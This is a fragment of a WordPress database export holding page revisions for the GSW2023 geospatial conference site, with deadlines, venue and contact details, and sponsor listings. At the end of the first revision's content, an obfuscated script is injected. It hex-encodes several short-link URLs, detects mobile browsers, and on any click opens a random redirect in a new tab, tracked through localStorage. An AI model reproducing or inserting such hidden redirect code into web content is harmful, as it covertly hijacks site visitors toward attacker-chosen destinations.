sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:45:17','2023-06-14 10:45:17','',3066,'https://gsw2023.com/?p=4695',0,'revision','',0),
(4696,1,'2023-06-14 10:46:47','2023-06-14 10:46:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px 